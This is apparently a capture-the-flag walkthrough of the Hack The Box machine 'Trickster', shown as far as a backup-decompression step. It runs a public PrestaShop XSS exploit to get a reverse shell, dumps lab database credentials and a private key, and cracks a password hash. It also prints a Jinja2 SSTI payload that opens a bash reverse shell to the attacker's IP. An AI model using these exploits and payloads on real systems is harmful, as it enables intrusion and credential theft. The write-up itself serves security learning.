Page cover

Trickster

Synopsis

Trickster is a medium linux machine created by EmSec. The subdomin shop.trickster.htb uses PrestaShop version 8.1.5 which is vulnerable to CVE-2024-34716 XSS vulnerability which gives us the shell as www-data. The mysql database contains the james hash which is crackable. The docker container is running and port 5000 of docker container is running the changedetection.io version 0.45.20 which is vulnerable to CVE-2024-32651 SSTI vulnerability which allows the RCE. The docker container contains the Backups directory with .br file which contains the adam's credentials. The adam is allowed to execute prusaslicer which is vulnerable to CVE-2023-47268 arbitrary code execution vulnerability which gives us shell as root.

OS
Difficulty
Points
Release Date
Retired Date

Linux

Medium

30

21-09-2024

01-02-2025


Enumeration

Nmap

Started the nmap scan and found ssh and http services running.

nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.34
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 19:17 EST
Warning: 10.10.11.34 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.34
Host is up (0.55s latency).
Not shown: 64272 closed tcp ports (conn-refused), 1261 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.07 seconds

Add the trickster.htb domain in /etc/hosts file.

Web - trickster.htb

The trickster is a online shopping platform where we can shop to all our shopping needs.

VIsiting the contact and shop endpoints, the contact form and shop.trickster.htb subdomain is found.

Add the shop.trickster.htb in /etc/hosts file.

Web - shop.trickster.htb

The subdomain has listed some of the products and we can buy it or add to cart.

The website is made using the prestashop. The prestashop is a open-source software platform to build the e-commerce websites.

Directory enumeration using fuff reveals the .git directory.

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://shop.trickster.htb/FUZZ -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shop.trickster.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

.git/config             [Status: 200, Size: 112, Words: 11, Lines: 8, Duration: 884ms]
.git/HEAD               [Status: 200, Size: 28, Words: 2, Lines: 2, Duration: 970ms]
.git/logs/              [Status: 200, Size: 1137, Words: 77, Lines: 18, Duration: 971ms]
.git/index              [Status: 200, Size: 252177, Words: 733, Lines: 978, Duration: 539ms]
:: Progress: [4723/4723] :: Job [1/1] :: 52 req/sec :: Duration: [0:01:22] :: Errors: 0 ::

Using gitdumper to dump the content in .git directory.

git-dumper http://shop.trickster.htb .git

Listing the contents in .git directory reveals the prestashop admin panel path.

admin634ewutrx1jgitlooaj  Install_PrestaShop.html  INSTALL.txt  LICENSES  Makefile

The 8.1.5 version of prestashop is vulnerable to XSS via customer contact, the details about the vulnerability is released by prestashop in their github repository.


Foothold

Shell - www-data [ CVE-2024-34716 Exploit ]

The aelmokhtar has published the script in github repository for exploiting the vulnerability. Git clone the repository.

git clone https://github.com/aelmokhtar/CVE-2024-34716                                               
Cloning into 'CVE-2024-34716'...
remote: Enumerating objects: 60, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (42/42), done.
remote: Total 60 (delta 30), reused 34 (delta 13), pack-reused 0 (from 0)
Receiving objects: 100% (60/60), 6.71 MiB | 782.00 KiB/s, done.
Resolving deltas: 100% (30/30), done.

Change directory to CVE-2024-34716 and run the exploit.py.

python3 exploit.py -h
usage: exploit.py [-h] --url URL --email EMAIL --local-ip LOCAL_IP
                  --admin-path ADMIN_PATH

CVE-2024-34716 Exploit

options:
  -h, --help            show this help message and exit
  --url URL             The Presta Shop base url.
  --email EMAIL         The email address of admin user.
  --local-ip LOCAL_IP   Local HTTP Server IP.
  --admin-path ADMIN_PATH
                        The Presta Shop admin path.
python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com --local-ip 10.10.16.19 --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
	Url: http://shop.trickster.htb
	Email: dexter@mail.com
	Local IP: 10.10.16.19
	Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:12345
Ncat: Listening on 0.0.0.0:12345
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [02/Feb/2025 04:25:54] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Ncat: Connection from 10.10.11.34:50560.
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 09:26:29 up 18:25,  0 users,  load average: 0.02, 0.16, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Lateral Movement

Pillaging - www-data [ user ]

The prestashop config file parameters.php gives us the credentials for mysql database.

$ pwd
/var/www/prestashop/app/config
parameters.php
<?php return array (
  'parameters' => 
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'ps_user',
    'database_password' => 'prest@shop_o',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2024-05-25',
    'locale' => 'en-US',
    'use_debug_toolbar' => true,
    'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
    'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
    'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
    'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
    'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw17S9nQ0PDi4OqsG6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
',
  ),
);

Shell - james

Upgrading the shell and using the credentials to login into mysql.

$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@trickster:~/prestashop/app/config$ ^Z
[1]  + 214361 suspended  python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com
stty raw -echo; fg
[1]  + 214361 continued  python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com 
www-data@trickster:~/prestashop/app/config$  
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prest@shop_o
Enter password: 
ERROR 1044 (42000): Access denied for user 'ps_user'@'localhost' to database 'prest@shop_o'
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prestashop  
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 26924
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [prestashop]> 

Enumerating the database gives us the james hash which we can use it into ssh.

MariaDB [prestashop]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| prestashop         |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [prestashop]> use prestashop;
Database changed
MariaDB [prestashop]> show tables;
+-------------------------------------------------+
| Tables_in_prestashop                            |
+-------------------------------------------------+
| ps_access                                       |
| ps_accessory                                    |
| ps_address                                      |
| ps_address_format                               |
| ps_admin_filter                                 |
| ps_alias                                        |
| ps_api_access                                   |
| ps_attachment                                   |
| ps_attachment_lang                              |
| ps_attribute                                    |
| ps_attribute_group                              |
| ps_attribute_group_lang                         |
| ps_attribute_group_shop                         |
| ps_attribute_lang                               |
| ps_attribute_shop                               |
| ps_authorization_role                           |
| ps_authorized_application                       |
| ps_blockwishlist_statistics                     |
| ps_carrier                                      |
| ps_carrier_group                                |
| ps_carrier_lang                                 |
| ps_carrier_shop                                 |
| ps_carrier_tax_rules_group_shop                 |
| ps_carrier_zone                                 |
| ps_cart                                         |
| ps_cart_cart_rule                               |
| ps_cart_product                                 |
| ps_cart_rule                                    |
| ps_cart_rule_carrier                            |
| ps_cart_rule_combination                        |
| ps_cart_rule_country                            |
| ps_cart_rule_group                              |
| ps_cart_rule_lang                               |
| ps_cart_rule_product_rule                       |
| ps_cart_rule_product_rule_group                 |
| ps_cart_rule_product_rule_value                 |
| ps_cart_rule_shop                               |
| ps_category                                     |
| ps_category_group                               |
| ps_category_lang                                |
| ps_category_product                             |
| ps_category_shop                                |
| ps_cms                                          |
| ps_cms_category                                 |
| ps_cms_category_lang                            |
| ps_cms_category_shop                            |
| ps_cms_lang                                     |
| ps_cms_role                                     |
| ps_cms_role_lang                                |
| ps_cms_shop                                     |
| ps_configuration                                |
| ps_configuration_kpi                            |
| ps_configuration_kpi_lang                       |
| ps_configuration_lang                           |
| ps_connections                                  |
| ps_connections_page                             |
| ps_connections_source                           |
| ps_contact                                      |
| ps_contact_lang                                 |
| ps_contact_shop                                 |
| ps_country                                      |
| ps_country_lang                                 |
| ps_country_shop                                 |
| ps_currency                                     |
| ps_currency_lang                                |
| ps_currency_shop                                |
| ps_customer                                     |
| ps_customer_group                               |
| ps_customer_message                             |
| ps_customer_message_sync_imap                   |
| ps_customer_session                             |
| ps_customer_thread                              |
| ps_customization                                |
| ps_customization_field                          |
| ps_customization_field_lang                     |
| ps_customized_data                              |
| ps_date_range                                   |
| ps_delivery                                     |
| ps_emailsubscription                            |
| ps_employee                                     |
| ps_employee_session                             |
| ps_employee_shop                                |
| ps_feature                                      |
| ps_feature_flag                                 |
| ps_feature_lang                                 |
| ps_feature_product                              |
| ps_feature_shop                                 |
| ps_feature_value                                |
| ps_feature_value_lang                           |
| ps_ganalytics                                   |
| ps_ganalytics_data                              |
| ps_gender                                       |
| ps_gender_lang                                  |
| ps_group                                        |
| ps_group_lang                                   |
| ps_group_reduction                              |
| ps_group_shop                                   |
| ps_gsitemap_sitemap                             |
| ps_guest                                        |
| ps_homeslider                                   |
| ps_homeslider_slides                            |
| ps_homeslider_slides_lang                       |
| ps_hook                                         |
| ps_hook_alias                                   |
| ps_hook_module                                  |
| ps_hook_module_exceptions                       |
| ps_image                                        |
| ps_image_lang                                   |
| ps_image_shop                                   |
| ps_image_type                                   |
| ps_import_match                                 |
| ps_info                                         |
| ps_info_lang                                    |
| ps_info_shop                                    |
| ps_lang                                         |
| ps_lang_shop                                    |
| ps_layered_category                             |
| ps_layered_filter                               |
| ps_layered_filter_block                         |
| ps_layered_filter_shop                          |
| ps_layered_indexable_attribute_group            |
| ps_layered_indexable_attribute_group_lang_value |
| ps_layered_indexable_attribute_lang_value       |
| ps_layered_indexable_feature                    |
| ps_layered_indexable_feature_lang_value         |
| ps_layered_indexable_feature_value_lang_value   |
| ps_layered_price_index                          |
| ps_layered_product_attribute                    |
| ps_link_block                                   |
| ps_link_block_lang                              |
| ps_link_block_shop                              |
| ps_linksmenutop                                 |
| ps_linksmenutop_lang                            |
| ps_log                                          |
| ps_mail                                         |
| ps_mailalert_customer_oos                       |
| ps_manufacturer                                 |
| ps_manufacturer_lang                            |
| ps_manufacturer_shop                            |
| ps_memcached_servers                            |
| ps_message                                      |
| ps_message_readed                               |
| ps_meta                                         |
| ps_meta_lang                                    |
| ps_module                                       |
| ps_module_access                                |
| ps_module_carrier                               |
| ps_module_country                               |
| ps_module_currency                              |
| ps_module_group                                 |
| ps_module_history                               |
| ps_module_preference                            |
| ps_module_shop                                  |
| ps_operating_system                             |
| ps_order_carrier                                |
| ps_order_cart_rule                              |
| ps_order_detail                                 |
| ps_order_detail_tax                             |
| ps_order_history                                |
| ps_order_invoice                                |
| ps_order_invoice_payment                        |
| ps_order_invoice_tax                            |
| ps_order_message                                |
| ps_order_message_lang                           |
| ps_order_payment                                |
| ps_order_return                                 |
| ps_order_return_detail                          |
| ps_order_return_state                           |
| ps_order_return_state_lang                      |
| ps_order_slip                                   |
| ps_order_slip_detail                            |
| ps_order_state                                  |
| ps_order_state_lang                             |
| ps_orders                                       |
| ps_pack                                         |
| ps_page                                         |
| ps_page_type                                    |
| ps_page_viewed                                  |
| ps_pagenotfound                                 |
| ps_product                                      |
| ps_product_attachment                           |
| ps_product_attribute                            |
| ps_product_attribute_combination                |
| ps_product_attribute_image                      |
| ps_product_attribute_lang                       |
| ps_product_attribute_shop                       |
| ps_product_carrier                              |
| ps_product_comment                              |
| ps_product_comment_criterion                    |
| ps_product_comment_criterion_category           |
| ps_product_comment_criterion_lang               |
| ps_product_comment_criterion_product            |
| ps_product_comment_grade                        |
| ps_product_comment_report                       |
| ps_product_comment_usefulness                   |
| ps_product_country_tax                          |
| ps_product_download                             |
| ps_product_group_reduction_cache                |
| ps_product_lang                                 |
| ps_product_sale                                 |
| ps_product_shop                                 |
| ps_product_supplier                             |
| ps_product_tag                                  |
| ps_profile                                      |
| ps_profile_lang                                 |
| ps_psgdpr_consent                               |
| ps_psgdpr_consent_lang                          |
| ps_psgdpr_log                                   |
| ps_psreassurance                                |
| ps_psreassurance_lang                           |
| ps_quick_access                                 |
| ps_quick_access_lang                            |
| ps_range_price                                  |
| ps_range_weight                                 |
| ps_request_sql                                  |
| ps_required_field                               |
| ps_risk                                         |
| ps_risk_lang                                    |
| ps_search_engine                                |
| ps_search_index                                 |
| ps_search_word                                  |
| ps_shop                                         |
| ps_shop_group                                   |
| ps_shop_url                                     |
| ps_smarty_cache                                 |
| ps_smarty_last_flush                            |
| ps_smarty_lazy_cache                            |
| ps_specific_price                               |
| ps_specific_price_priority                      |
| ps_specific_price_rule                          |
| ps_specific_price_rule_condition                |
| ps_specific_price_rule_condition_group          |
| ps_state                                        |
| ps_statssearch                                  |
| ps_stock                                        |
| ps_stock_available                              |
| ps_stock_mvt                                    |
| ps_stock_mvt_reason                             |
| ps_stock_mvt_reason_lang                        |
| ps_store                                        |
| ps_store_lang                                   |
| ps_store_shop                                   |
| ps_supplier                                     |
| ps_supplier_lang                                |
| ps_supplier_shop                                |
| ps_supply_order                                 |
| ps_supply_order_detail                          |
| ps_supply_order_history                         |
| ps_supply_order_receipt_history                 |
| ps_supply_order_state                           |
| ps_supply_order_state_lang                      |
| ps_tab                                          |
| ps_tab_lang                                     |
| ps_tab_module_preference                        |
| ps_tag                                          |
| ps_tag_count                                    |
| ps_tax                                          |
| ps_tax_lang                                     |
| ps_tax_rule                                     |
| ps_tax_rules_group                              |
| ps_tax_rules_group_shop                         |
| ps_timezone                                     |
| ps_translation                                  |
| ps_warehouse                                    |
| ps_warehouse_carrier                            |
| ps_warehouse_product_location                   |
| ps_warehouse_shop                               |
| ps_web_browser                                  |
| ps_webservice_account                           |
| ps_webservice_account_shop                      |
| ps_webservice_permission                        |
| ps_wishlist                                     |
| ps_wishlist_product                             |
| ps_wishlist_product_cart                        |
| ps_zone                                         |
| ps_zone_shop                                    |
+-------------------------------------------------+
276 rows in set (0.001 sec)

MariaDB [prestashop]> SELECT firstname, lastname ,email, passwd FROM ps_employee;
+-----------+----------+---------------------+--------------------------------------------------------------+
| firstname | lastname | email               | passwd                                                       |
+-----------+----------+---------------------+--------------------------------------------------------------+
| Trickster | Store    | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james     | james    | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+-----------+----------+---------------------+--------------------------------------------------------------+
2 rows in set (0.000 sec)

MariaDB [prestashop]> 

Cracked the james hash using hashcat.

hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm:alwaysandforever
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6y...yunCmm
Time.Started.....: Sun Feb  2 05:45:30 2025 (4 secs)
Time.Estimated...: Sun Feb  2 05:45:34 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     8821 H/s (6.76ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 37056/14344385 (0.26%)
Rejected.........: 0/37056 (0.00%)
Restore.Point....: 36992/14344385 (0.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-16
Candidate.Engine.: Device Generator
Candidates.#1....: boazona -> Yankees
Hardware.Mon.#1..: Temp: 73c Util: 95%

Started: Sun Feb  2 05:45:26 2025
Stopped: Sun Feb  2 05:45:36 2025
ssh james@10.10.11.34
The authenticity of host '10.10.11.34 (10.10.11.34)' can't be established.
ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.34' (ED25519) to the list of known hosts.
james@10.10.11.34's password: 
Last login: Sun Feb  2 04:19:21 2025 from 10.10.14.7
james@trickster:~$ 

The user.txt file contains the user flag 👏


Pivoting

Pillaging - james [ user ]

The ps aux reveals that the root is running Docker container and changedetection.py in /datastore directory.

james@trickster:~$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 166548 11920 ?        Ss   Feb01   0:13 /sbin/init
----- SNIP -----
root      199684  0.0  0.3 1238144 12756 ?       Sl   01:00   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id a4b9a36ae7ffc48c2b451ead77f93a8572869906f386773c3de52
root      199704  0.4  1.8 1300332 74168 ?       Ssl  01:00   0:01 python ./changedetection.py -d /datastore
----- SNIP -----
runner    200150  0.1  0.0      0     0 ?        Z    01:05   0:00 [chromedriver] <defunct>
james     200236  0.0  0.0  10072  1604 pts/1    R+   01:06   0:00 ps aux

The ip addr reveals the Docker container network interface configuration and its IP address.

james@trickster:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:73:b3 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.34/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:04:bf:9f:0d brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
209: veth484e19f@if208: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 0e:e7:8b:7f:b2:ce brd ff:ff:ff:ff:ff:ff link-netnsid 0

The ping sweep is used to find the active and listening ip addresses in docker container. The two ip addresses are active and listening 172.17.0.1 and 172.17.0.2

james@trickster:~$ for i in {1..254}; do (ping -c 1 172.17.0.$i | grep ttl &) ; done
64 bytes from 172.17.0.1: icmp_seq=1 ttl=64 time=0.071 ms
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.048 ms

The port scan finds the 5000 port open.

james@trickster:~$ for port in {1..65535}; do echo > /dev/tcp/172.17.0.2/$port && echo "$port open"; done 2>/dev/null
5000 open

Pillaging - Port 5000

Curling the 5000 port the changedetection version 0.45.20 service is running in the website.

james@trickster:~$ curl -L http://172.17.0.2:5000
<!DOCTYPE html>
<html lang="en" data-darkmode="false">

  <head>
    <meta charset="utf-8" >
    <meta name="viewport" content="width=device-width, initial-scale=1.0" >
    <meta name="description" content="Self hosted website change detection." >
    <title>Change Detection</title>
    <link rel="alternate" type="application/rss+xml" title="Changedetection.io » Feed" href="/rss?tag=&amp;token=" >
    <link rel="stylesheet" href="/static/styles/pure-min.css" >
    <link rel="stylesheet" href="/static/styles/styles.css?v=0.45.20" >
----- SNIP -----

Port forward the 5000 port via ssh.

ssh -L 5000:172.17.0.2:5000 james@10.10.11.34
james@10.10.11.34's password: 
Last login: Mon Feb  3 01:02:16 2025 from 10.10.16.19
james@trickster:~$ 

The Login page of changedetection.io is presented with password field.

Using the password of james will give us access to the changedetection.

Shell - Docker Container [ root - CVE-2024-32651 changedetection SSTI ]

The changedetection is the open source web page change detection, website watcher, restock monitor and notification service. The source code and documentation is found in this github repository. The changedetection version <= 0.45.20 is vulnerable to CVE-2024-32651 Server Side Template Injection in Jinja2 which allows the RCE. More details and PoC is found here.

Following the above PoC with below given payloads gives us the shell of root in Docker Container.

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/10.10.16.19/8443 0>&1"').read() }}

Settings > Notification > Insert your payload > click on Send test notification

nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.34 53796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@a4b9a36ae7ff:/app#

Don't press the OK in alert it will end the shell.

Pillaging - root [ user - Docker Container ]

Enumerating the /datastore directory, found the Backup directory which contains the zip files.

root@a4b9a36ae7ff:/app# cd /datastore
cd /datastore
root@a4b9a36ae7ff:/datastore# ls
ls
Backups
b86f1003-3ecb-4125-b090-27e15ca605b9
bbdd78f6-db98-45eb-9e7b-681a0c60ea34
secret.txt
url-list-with-tags.txt
url-list.txt
url-watches.json
root@a4b9a36ae7ff:/datastore# cd Backups
cd Backups
root@a4b9a36ae7ff:/datastore/Backups# ls
ls
changedetection-backup-20240830194841.zip
changedetection-backup-20240830202524.zip
root@a4b9a36ae7ff:/datastore/Backups#

The nc and unzip is not present in the system.

Shell - adam

I will be using tar to compress the Backups directory and use base64 to convert it into base64.

root@ae5c137aa8ef:/datastore/Backups# cd ..
cd ..
root@ae5c137aa8ef:/# tar czf datastore.tar.gz Backups/
tar czf datastore.tar.gz Backups/
root@a4b9a36ae7ff:/datastore# base64 datastore.tar.gz -w0
base64 datastore.tar.gz -w0

Copy the outputted base64 text and save it into the file in your local machine. Then decompile the base64 and decompress it using tar.

base64 -d backup > backups.tar.gz
tar -xvf backups.tar.gz
Backups/
Backups/changedetection-backup-20240830202524.zip
Backups/changedetection-backup-20240830194841.zip

Change directory into Backups directory and unzipping the first file contains the .br file.

cd Backups 
unzip changedetection-backup-20240830194841.zip
Archive:  changedetection-backup-20240830194841.zip
   creating: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/
 extracting: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br  
 extracting: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/history.txt  
  inflating: secret.txt              
  inflating: url-list.txt            
  inflating: url-list-with-tags.txt  
  inflating: url-watches.json    

The brotli command is used to decompress the .br file. If not present in your system apt install to get it.

